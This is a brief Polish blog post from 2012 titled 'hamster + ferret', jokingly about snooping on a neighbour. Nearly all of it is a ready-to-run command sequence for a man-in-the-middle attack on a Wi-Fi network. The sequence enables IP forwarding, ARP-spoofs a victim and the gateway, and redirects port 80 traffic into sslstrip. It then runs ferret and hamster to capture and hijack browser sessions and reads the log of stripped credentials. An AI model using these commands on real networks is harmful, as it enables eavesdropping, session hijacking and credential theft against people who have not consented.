poniedziałek, 26 marca 2012

hamster + ferret

czyli co słychać u sąsiada ;)
Komendy:
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i wlan1 -t 192.168.1.107 192.168.1.1
arpspoof -i wlan1 192.168.1.1(opcjonalnie cala siec)
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
sslstrip -p -k -f
cd /pentest/sniffers/hamster
./ferret -i wlan1
cd /pentest/sniffers/hamster
./hamster -i wlan1
cat /root/sslstrip.log
pamietajcie o zmianie ustawien przegladarki na proxy :D GAME OVER

Brak komentarzy:

Prześlij komentarz